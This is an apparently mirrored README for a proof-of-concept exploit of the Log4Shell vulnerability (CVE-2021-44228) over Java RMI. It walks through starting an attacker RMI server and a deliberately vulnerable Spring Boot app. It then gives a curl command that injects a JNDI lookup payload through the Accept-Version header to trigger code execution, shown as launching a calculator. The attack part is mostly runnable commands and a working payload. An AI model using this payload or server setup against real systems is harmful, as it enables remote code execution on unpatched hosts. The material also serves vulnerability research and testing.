## https://sploitus.com/exploit?id=61AC9232-A772-5D63-9DFC-BFE4976418C7
# log4shell-rmi-poc
A Proof of Concept of the Log4j vulnerability (CVE-2021-44228) over Java-RMI
<br/>
It uses Log4j 2.5.7 from spring-boot-starter-log4j2
## Requirements:
Tested with Java 8 (JDK 1.8.0_25) and Java 11 (JDK 11.0.1)
## How to run the POC
### 1. Clone the repo:
```bash
git clone https://github.com/Labout/log4shell-rmi-poc.git
```
### 2. Start the attacker RMI Server
```bash
cd Log4jshell_rmi_server
./mvnw clean package
java -jar target/Log4jshell.rmi.server-0.0.1-SNAPSHOT.jar
```
You should get something like this:
![rmi server](./rmi_server.png)
### 3. Start the vulnerable Log4j application (here a spring boot application)
In a new Terminal
```bash
cd vulnerabel_log4j_app
./mvnw clean package
java -jar target/vulnerabel_log4j_app-0.0.1-SNAPSHOT.jar
```
### 4. Inject a vulnerable JNDI over the "Accept-version" header
```bash
curl 'http://localhost:8080/hello' --header 'Accept-Version: ${jndi:rmi://127.0.0.1:1099/ExecByEL}'
```
As you can see the the vulnerable app calls the Calculator app.
![exploit](./exploit.png)
## References
https://www.cisecurity.org/log4j-zero-day-vulnerability-response/
<br>
https://www.lunasec.io/docs/blog/log4j-zero-day/